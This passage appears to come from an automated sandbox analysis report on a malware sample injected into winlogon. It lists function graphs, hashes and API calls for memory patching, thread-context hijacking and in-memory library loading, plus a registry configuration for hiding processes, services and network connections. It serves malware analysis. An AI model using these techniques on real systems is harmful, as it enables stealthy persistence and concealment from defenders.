                                                                    • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                    • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                    • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                    Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000031.00000002.3432798138.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000031.00000002.3432668902.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3432900440.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000031.00000002.3433014237.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_49_2_140000000_dialer.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: ntdll.dll
                                                                    • API String ID: 1646373207-2227199552
                                                                    • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                    • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                    • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                    • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                    Execution Graph

                                                                    Execution Coverage:1.7%
                                                                    Dynamic/Decrypted Code Coverage:95.2%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:126
                                                                    Total number of Limit Nodes:16
                                                                    execution_graph 15119 2d0165e1abc 15124 2d0165e1628 GetProcessHeap 15119->15124 15121 2d0165e1ad2 Sleep SleepEx 15122 2d0165e1acb 15121->15122 15122->15121 15123 2d0165e1598 StrCmpIW StrCmpW 15122->15123 15123->15122 15125 2d0165e1648 _invalid_parameter_noinfo 15124->15125 15169 2d0165e1268 GetProcessHeap 15125->15169 15127 2d0165e1650 15128 2d0165e1268 2 API calls 15127->15128 15129 2d0165e1661 15128->15129 15130 2d0165e1268 2 API calls 15129->15130 15131 2d0165e166a 15130->15131 15132 2d0165e1268 2 API calls 15131->15132 15133 2d0165e1673 15132->15133 15134 2d0165e168e RegOpenKeyExW 15133->15134 15135 2d0165e18a6 15134->15135 15136 2d0165e16c0 RegOpenKeyExW 15134->15136 15135->15122 15137 2d0165e16ff RegOpenKeyExW 15136->15137 15138 2d0165e16e9 15136->15138 15140 2d0165e173a RegOpenKeyExW 15137->15140 15141 2d0165e1723 15137->15141 15180 2d0165e12bc RegQueryInfoKeyW 15138->15180 15144 2d0165e175e 15140->15144 15145 2d0165e1775 RegOpenKeyExW 15140->15145 15173 2d0165e104c RegQueryInfoKeyW 15141->15173 15147 2d0165e12bc 13 API calls 15144->15147 15148 2d0165e1799 15145->15148 15149 2d0165e17b0 RegOpenKeyExW 15145->15149 15153 2d0165e176b RegCloseKey 15147->15153 15150 2d0165e12bc 13 API calls 15148->15150 15151 2d0165e17eb RegOpenKeyExW 15149->15151 15152 2d0165e17d4 15149->15152 15154 2d0165e17a6 RegCloseKey 15150->15154 15156 2d0165e180f 15151->15156 15157 2d0165e1826 RegOpenKeyExW 15151->15157 15155 2d0165e12bc 13 API calls 15152->15155 15153->15145 15154->15149 15158 2d0165e17e1 RegCloseKey 15155->15158 15159 2d0165e104c 5 API calls 15156->15159 15160 2d0165e184a 15157->15160 15161 2d0165e1861 RegOpenKeyExW 15157->15161 15158->15151 15162 2d0165e181c RegCloseKey 15159->15162 15163 2d0165e104c 5 API calls 15160->15163 15164 2d0165e189c RegCloseKey 15161->15164 15165 2d0165e1885 15161->15165 15162->15157 15167 2d0165e1857 RegCloseKey 15163->15167 15164->15135 15166 2d0165e104c 5 API calls 15165->15166 15168 2d0165e1892 RegCloseKey 15166->15168 15167->15161 15168->15164 15191 2d0165f6168 15169->15191 15171 2d0165e1283 GetProcessHeap 15172 2d0165e12ae _invalid_parameter_noinfo 15171->15172 15172->15127 15174 2d0165e10bf 15173->15174 15175 2d0165e11b5 RegCloseKey 15173->15175 15174->15175 15176 2d0165e10cf RegEnumValueW 15174->15176 15175->15140 15178 2d0165e1125 _invalid_parameter_noinfo 15176->15178 15177 2d0165e114e GetProcessHeap 15177->15178 15178->15175 15178->15176 15178->15177 15179 2d0165e116e GetProcessHeap HeapFree 15178->15179 15179->15178 15181 2d0165e148a RegCloseKey 15180->15181 15182 2d0165e1327 GetProcessHeap 15180->15182 15181->15137 15183 2d0165e133e _invalid_parameter_noinfo 15182->15183 15184 2d0165e1476 GetProcessHeap HeapFree 15183->15184 15185 2d0165e1352 RegEnumValueW 15183->15185 15187 2d0165e141e lstrlenW GetProcessHeap 15183->15187 15188 2d0165e13d3 GetProcessHeap 15183->15188 15189 2d0165e13f3 GetProcessHeap HeapFree 15183->15189 15190 2d0165e1443 StrCpyW 15183->15190 15193 2d0165e152c 15183->15193 15184->15181 15185->15183 15187->15183 15188->15183 15189->15187 15190->15183 15192 2d0165f6177 15191->15192 15192->15192 15194 2d0165e1546 15193->15194 15197 2d0165e157c 15193->15197 15195 2d0165e155d StrCmpIW 15194->15195 15196 2d0165e1565 StrCmpW 15194->15196 15194->15197 15195->15194 15196->15194 15197->15183 15198 2d0165e554d 15200 2d0165e5554 15198->15200 15199 2d0165e55bb 15200->15199 15201 2d0165e5637 VirtualProtect 15200->15201 15202 2d0165e5663 GetLastError 15201->15202 15203 2d0165e5671 15201->15203 15202->15203 15204 2d01658273c 15205 2d01658276a 15204->15205 15206 2d0165827c5 VirtualAlloc 15205->15206 15209 2d0165828d4 15205->15209 15208 2d0165827ec 15206->15208 15206->15209 15207 2d016582858 LoadLibraryA 15207->15208 15208->15207 15208->15209 15210 2d0165e28c8 15211 2d0165e290e 15210->15211 15212 2d0165e2970 15211->15212 15214 2d0165e3844 15211->15214 15215 2d0165e3866 15214->15215 15216 2d0165e3851 StrCmpNIW 15214->15216 15215->15211 15216->15215 15217 2d0165e3ab9 15220 2d0165e3a06 15217->15220 15218 2d0165e3a70 15219 2d0165e3a56 VirtualQuery 15219->15218 15219->15220 15220->15218 15220->15219 15221 2d0165e3a8a VirtualAlloc 15220->15221 15221->15218 15222 2d0165e3abb GetLastError 15221->15222 15222->15218 15222->15220 15223 2d0165e5cf0 15224 2d0165e5cfd 15223->15224 15225 2d0165e5d09 15224->15225 15231 2d0165e5e1a 15224->15231 15226 2d0165e5d3e 15225->15226 15227 2d0165e5d8d 15225->15227 15228 2d0165e5d66 SetThreadContext 15226->15228 15228->15227 15229 2d0165e5efe 15232 2d0165e5f1e 15229->15232 15245 2d0165e43e0 15229->15245 15230 2d0165e5e41 VirtualProtect FlushInstructionCache 15230->15231 15231->15229 15231->15230 15241 2d0165e4df0 GetCurrentProcess 15232->15241 15235 2d0165e5f23 15236 2d0165e5f77 15235->15236 15237 2d0165e5f37 ResumeThread 15235->15237 15249 2d0165e7940 15236->15249 15238 2d0165e5f6b 15237->15238 15238->15235 15240 2d0165e5fbf 15242 2d0165e4e0c 15241->15242 15243 2d0165e4e22 VirtualProtect FlushInstructionCache 15242->15243 15244 2d0165e4e53 15242->15244 15243->15242 15244->15235 15246 2d0165e43fc 15245->15246 15247 2d0165e445f 15246->15247 15248 2d0165e4412 VirtualFree 15246->15248 15247->15232 15248->15246 15251 2d0165e7949 _log10_special 15249->15251 15250 2d0165e7954 15250->15240 15251->15250 15254 2d0165e8320 15251->15254 15253 2d0165e8157 15253->15240 15257 2d0165e8331 capture_previous_context 15254->15257 15255 2d0165e833a RtlLookupFunctionEntry 15256 2d0165e8389 15255->15256 15255->15257 15256->15253 15257->15255 15257->15256

                                                                    Executed Functions

                                                                    Function 000002D0165E1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                    • API String ID: 106492572-2879589442
                                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction ID: 5ecbaa186e8d59cd892059c32c6735f956b01256b6e0a22be3f8683e5b015701
                                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction Fuzzy Hash: EE711936210A9086EB209FB6ECD8B9973A5F784B89F801112DE4E47B78EF35C954C744
                                                                    Function 000002D0165E3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                    • String ID: wr
                                                                    • API String ID: 1092925422-2678910430
                                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction ID: 4674d9df3d536e982c299afeb10ddbd57cf0d0b09ef677d7c97c0013872c700b
                                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction Fuzzy Hash: 6411A126305781C2FF149B61F848769B2B4F748B85F84002ADE8D03765EF3ECA05C714
                                                                    Function 000002D0165E5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 59 2d0165e5b30-2d0165e5b57 60 2d0165e5b6b-2d0165e5b76 GetCurrentThreadId 59->60 61 2d0165e5b59-2d0165e5b68 59->61 62 2d0165e5b78-2d0165e5b7d 60->62 63 2d0165e5b82-2d0165e5b89 60->63 61->60 64 2d0165e5faf-2d0165e5fc6 call 2d0165e7940 62->64 65 2d0165e5b9b-2d0165e5baf 63->65 66 2d0165e5b8b-2d0165e5b96 call 2d0165e5960 63->66 67 2d0165e5bbe-2d0165e5bc4 65->67 66->64 70 2d0165e5bca-2d0165e5bd3 67->70 71 2d0165e5c95-2d0165e5cb6 67->71 74 2d0165e5c1a-2d0165e5c8d call 2d0165e4510 call 2d0165e44b0 call 2d0165e4470 70->74 75 2d0165e5bd5-2d0165e5c18 call 2d0165e85c0 70->75 77 2d0165e5e1f-2d0165e5e30 call 2d0165e74bf 71->77 78 2d0165e5cbc-2d0165e5cdc GetThreadContext 71->78 88 2d0165e5c90 74->88 75->88 90 2d0165e5e35-2d0165e5e3b 77->90 81 2d0165e5e1a 78->81 82 2d0165e5ce2-2d0165e5d03 78->82 81->77 82->81 92 2d0165e5d09-2d0165e5d12 82->92 88->67 94 2d0165e5efe-2d0165e5f0e 90->94 95 2d0165e5e41-2d0165e5e98 VirtualProtect FlushInstructionCache 90->95 97 2d0165e5d14-2d0165e5d25 92->97 98 2d0165e5d92-2d0165e5da3 92->98 104 2d0165e5f1e-2d0165e5f2a call 2d0165e4df0 94->104 105 2d0165e5f10-2d0165e5f17 94->105 99 2d0165e5e9a-2d0165e5ea4 95->99 100 2d0165e5ec9-2d0165e5ef9 call 2d0165e78ac 95->100 106 2d0165e5d8d 97->106 107 2d0165e5d27-2d0165e5d3c 97->107 101 2d0165e5e15 98->101 102 2d0165e5da5-2d0165e5dc3 98->102 99->100 110 2d0165e5ea6-2d0165e5ec1 call 2d0165e4390 99->110 100->90 102->101 112 2d0165e5dc5-2d0165e5e0c call 2d0165e3900 102->112 121 2d0165e5f2f-2d0165e5f35 104->121 105->104 113 2d0165e5f19 call 2d0165e43e0 105->113 106->101 107->106 108 2d0165e5d3e-2d0165e5d88 call 2d0165e3970 SetThreadContext 107->108 108->106 110->100 112->101 126 2d0165e5e10 call 2d0165e74dd 112->126 113->104 124 2d0165e5f77-2d0165e5f95 121->124 125 2d0165e5f37-2d0165e5f75 ResumeThread call 2d0165e78ac 121->125 128 2d0165e5fa9 124->128 129 2d0165e5f97-2d0165e5fa6 124->129 125->121 126->101 128->64 129->128
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Current$Context
                                                                    • String ID:
                                                                    • API String ID: 1666949209-0
                                                                    • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                    • Instruction ID: d170addcbda7b12596392159c148f3388fdea41b115c5373cd1e58d87ea25250
                                                                    • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                    • Instruction Fuzzy Hash: 01D18B76205B8882DB709B56E8D435AB7A0F388B88F504117EACD47BB5DF3ECA55CB40
                                                                    Function 000002D0165E50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 131 2d0165e50d0-2d0165e50fc 132 2d0165e50fe-2d0165e5106 131->132 133 2d0165e510d-2d0165e5116 131->133 132->133 134 2d0165e5118-2d0165e5120 133->134 135 2d0165e5127-2d0165e5130 133->135 134->135 136 2d0165e5132-2d0165e513a 135->136 137 2d0165e5141-2d0165e514a 135->137 136->137 138 2d0165e514c-2d0165e5151 137->138 139 2d0165e5156-2d0165e5161 GetCurrentThreadId 137->139 140 2d0165e56d3-2d0165e56da 138->140 141 2d0165e516d-2d0165e5174 139->141 142 2d0165e5163-2d0165e5168 139->142 143 2d0165e5176-2d0165e517c 141->143 144 2d0165e5181-2d0165e518a 141->144 142->140 143->140 145 2d0165e518c-2d0165e5191 144->145 146 2d0165e5196-2d0165e51a2 144->146 145->140 147 2d0165e51ce-2d0165e5225 call 2d0165e56e0 * 2 146->147 148 2d0165e51a4-2d0165e51c9 146->148 153 2d0165e523a-2d0165e5243 147->153 154 2d0165e5227-2d0165e522e 147->154 148->140 157 2d0165e5255-2d0165e525e 153->157 158 2d0165e5245-2d0165e5252 153->158 155 2d0165e5236 154->155 156 2d0165e5230 154->156 160 2d0165e52a6-2d0165e52aa 155->160 159 2d0165e52b0-2d0165e52b6 156->159 161 2d0165e5273-2d0165e5298 call 2d0165e7870 157->161 162 2d0165e5260-2d0165e5270 157->162 158->157 163 2d0165e52b8-2d0165e52d4 call 2d0165e4390 159->163 164 2d0165e52e5-2d0165e52eb 159->164 160->159 172 2d0165e529e 161->172 173 2d0165e532d-2d0165e5342 call 2d0165e3cc0 161->173 162->161 163->164 174 2d0165e52d6-2d0165e52de 163->174 167 2d0165e52ed-2d0165e530c call 2d0165e78ac 164->167 168 2d0165e5315-2d0165e5328 164->168 167->168 168->140 172->160 178 2d0165e5344-2d0165e534c 173->178 179 2d0165e5351-2d0165e535a 173->179 174->164 178->160 180 2d0165e536c-2d0165e53ba call 2d0165e8c60 179->180 181 2d0165e535c-2d0165e5369 179->181 184 2d0165e53c2-2d0165e53ca 180->184 181->180 185 2d0165e54d7-2d0165e54df 184->185 186 2d0165e53d0-2d0165e54bb call 2d0165e7440 184->186 188 2d0165e5523-2d0165e552b 185->188 189 2d0165e54e1-2d0165e54f4 call 2d0165e4590 185->189 198 2d0165e54bf-2d0165e54ce call 2d0165e4060 186->198 199 2d0165e54bd 186->199 191 2d0165e552d-2d0165e5535 188->191 192 2d0165e5537-2d0165e5546 188->192 200 2d0165e54f8-2d0165e5521 189->200 201 2d0165e54f6 189->201 191->192 195 2d0165e5554-2d0165e5561 191->195 196 2d0165e554f 192->196 197 2d0165e5548 192->197 202 2d0165e5564-2d0165e55b9 call 2d0165e85c0 195->202 203 2d0165e5563 195->203 196->195 197->196 208 2d0165e54d2 198->208 209 2d0165e54d0 198->209 199->185 200->185 201->188 210 2d0165e55bb-2d0165e55c3 202->210 211 2d0165e55c8-2d0165e5661 call 2d0165e4510 call 2d0165e4470 VirtualProtect 202->211 203->202 208->184 209->185 216 2d0165e5663-2d0165e5668 GetLastError 211->216 217 2d0165e5671-2d0165e56d1 211->217 216->217 217->140
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                    • Instruction ID: c79f08a0408f7d8f647ff0ca48cb583e9eb7eb6c6cfc1174afee583460d097fa
                                                                    • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                    • Instruction Fuzzy Hash: 5402A832619BC486EB60CB95E89435AF7A1F3C4794F504016EACE87BA9DF7EC954CB00
                                                                    Function 000002D0165E39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$AllocQuery
                                                                    • String ID:
                                                                    • API String ID: 31662377-0
                                                                    • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                    • Instruction ID: 28efb8197a5b457b3dea2d752150fd58e1380e9d813bcaab70eb5bc99618508c
                                                                    • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                    • Instruction Fuzzy Hash: B9311722219AC481EF30DB95E89935EE6A0F384784F900526F5CD467B9DF7ECB808B04
                                                                    Function 000002D0165E328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                    • String ID:
                                                                    • API String ID: 1683269324-0
                                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction ID: 9ff0edd3e6e9ab198c3d17986b58ccebaadaacc8bbb4bde1db76d12e6f3558f5
                                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction Fuzzy Hash: 1C1161306147C182FF6097E1FDCDB69A298AB58345FD0512BE90E815F6EF7ACE44C210
                                                                    Function 000002D0165E4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 3733156554-0
                                                                    • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                    • Instruction ID: d1e0e70aa0f07598b53ed8611aa5d9f6cf8e10010ed7fed8d00852c42d35725f
                                                                    • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                    • Instruction Fuzzy Hash: FFF0BD26219B84C1DB30DB85E89575AABA0F3887D4F945117BACD47B79CA3ECA908B40
                                                                    Function 000002D01658273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 265 2d01658273c-2d0165827a4 call 2d0165829d4 * 4 274 2d0165827aa-2d0165827ad 265->274 275 2d0165829b2 265->275 274->275 276 2d0165827b3-2d0165827b6 274->276 277 2d0165829b4-2d0165829d0 275->277 276->275 278 2d0165827bc-2d0165827bf 276->278 278->275 279 2d0165827c5-2d0165827e6 VirtualAlloc 278->279 279->275 280 2d0165827ec-2d01658280c 279->280 281 2d016582838-2d01658283f 280->281 282 2d01658280e-2d016582836 280->282 283 2d0165828df-2d0165828e6 281->283 284 2d016582845-2d016582852 281->284 282->281 282->282 285 2d0165828ec-2d016582901 283->285 286 2d016582992-2d0165829b0 283->286 284->283 287 2d016582858-2d01658286a LoadLibraryA 284->287 285->286 288 2d016582907 285->288 286->277 289 2d0165828ca-2d0165828d2 287->289 290 2d01658286c-2d016582878 287->290 293 2d01658290d-2d016582921 288->293 289->287 291 2d0165828d4-2d0165828d9 289->291 294 2d0165828c5-2d0165828c8 290->294 291->283 296 2d016582982-2d01658298c 293->296 297 2d016582923-2d016582934 293->297 294->289 295 2d01658287a-2d01658287d 294->295 301 2d01658287f-2d0165828a5 295->301 302 2d0165828a7-2d0165828b7 295->302 296->286 296->293 299 2d01658293f-2d016582943 297->299 300 2d016582936-2d01658293d 297->300 305 2d01658294d-2d016582951 299->305 306 2d016582945-2d01658294b 299->306 304 2d016582970-2d016582980 300->304 303 2d0165828ba-2d0165828c1 301->303 302->303 303->294 304->296 304->297 307 2d016582963-2d016582967 305->307 308 2d016582953-2d016582961 305->308 306->304 307->304 310 2d016582969-2d01658296c 307->310 308->304 310->304
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436521860.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d016580000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: AllocLibraryLoadVirtual
                                                                    • String ID:
                                                                    • API String ID: 3550616410-0
                                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction ID: 0197585b0632c450f7244b768ee28b396eb2739c6a19c1b09bc8c1b93abfbced
                                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction Fuzzy Hash: 01610532B016D087EB54CF56988872D7B9AF754BD4F98C122DE5D07B98DA34DC92C780
                                                                    Function 000002D0165E1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 000002D0165E1628: GetProcessHeap.KERNEL32 ref: 000002D0165E1633
                                                                      • Part of subcall function 000002D0165E1628: HeapAlloc.KERNEL32 ref: 000002D0165E1642
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16B2
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E16DF
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E16F9
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1719
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1734
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1754
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E176F
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E178F
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17AA
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E17CA
                                                                    • Sleep.KERNEL32 ref: 000002D0165E1AD7
                                                                    • SleepEx.KERNELBASE ref: 000002D0165E1ADD
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17E5
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1805
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1820
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E1840
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E185B
                                                                      • Part of subcall function 000002D0165E1628: RegOpenKeyExW.ADVAPI32 ref: 000002D0165E187B
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1896
                                                                      • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E18A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000036.00000002.3436664152.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_54_2_2d0165e0000_winlogon.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1534210851-0
                                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction ID: 07e4e4e3ba5978a263fb33c37be15a198cbe7b0fb120eabd57c8358f31885df7
                                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction Fuzzy Hash: D331C061A006C141FF709BA6DEC93E9B3A9AB44BC6F8454279E0E8B7B5EE15CD51C210

                                                                    Non-executed Functions

                                                                    Function 000002D0165E2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 573 2d0165e2b2c-2d0165e2ba5 call 2d016602ce0 576 2d0165e2bab-2d0165e2bb1 573->576 577 2d0165e2ee0-2d0165e2f03 573->577 576->577 578 2d0165e2bb7-2d0165e2bba 576->578 578->577 579 2d0165e2bc0-2d0165e2bc3 578->579 579->577 580 2d0165e2bc9-2d0165e2bd9 GetModuleHandleA 579->580 581 2d0165e2bed 580->581 582 2d0165e2bdb-2d0165e2beb call 2d0165f6090 580->582 583 2d0165e2bf0-2d0165e2c0e 581->583 582->583 583->577 587 2d0165e2c14-2d0165e2c33 StrCmpNIW 583->587 587->577 588 2d0165e2c39-2d0165e2c3d 587->588 588->577 589 2d0165e2c43-2d0165e2c4d 588->589 589->577 590 2d0165e2c53-2d0165e2c5a 589->590 590->577 591 2d0165e2c60-2d0165e2c73 590->591 592 2d0165e2c75-2d0165e2c81 591->592 593 2d0165e2c83 591->593 594 2d0165e2c86-2d0165e2c8a 592->594 593->594 595 2d0165e2c8c-2d0165e2c98 594->595 596 2d0165e2c9a 594->596 597 2d0165e2c9d-2d0165e2ca7 595->597 596->597 598 2d0165e2d9d-2d0165e2da1 597->598 599 2d0165e2cad-2d0165e2cb0 597->599 602 2d0165e2da7-2d0165e2daa 598->602 603 2d0165e2ed2-2d0165e2eda 598->603 600 2d0165e2cc2-2d0165e2ccc 599->600 601 2d0165e2cb2-2d0165e2cbf call 2d0165e199c 599->601 605 2d0165e2cce-2d0165e2cdb 600->605 606 2d0165e2d00-2d0165e2d0a 600->606 601->600 607 2d0165e2dac-2d0165e2db8 call 2d0165e199c 602->607 608 2d0165e2dbb-2d0165e2dc5 602->608 603->577 603->591 605->606 612 